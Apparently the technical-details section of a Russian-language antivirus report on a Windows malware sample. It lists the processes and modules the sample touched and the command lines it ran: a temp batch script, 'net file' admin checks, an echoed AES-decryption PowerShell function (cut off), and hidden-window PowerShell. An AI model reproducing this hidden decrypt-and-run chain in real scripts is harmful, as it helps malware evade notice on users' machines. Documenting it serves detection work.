Техническая информация
- %WINDIR%\explorer.exe
- <SYSTEM32>\svchost.exe
- Процесс svchost.exe, модуль pdh.dll
- Процесс powershell.exe, модуль Amsi.dll
- Процесс powershell.exe, модуль ntdll.dll
- %TEMP%\temp_script.bat
- nul
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\temp_script.bat" "
- '<SYSTEM32>\net.exe' file
- '<SYSTEM32>\net1.exe' file
- '<SYSTEM32>\cmd.exe' /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[Syst...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden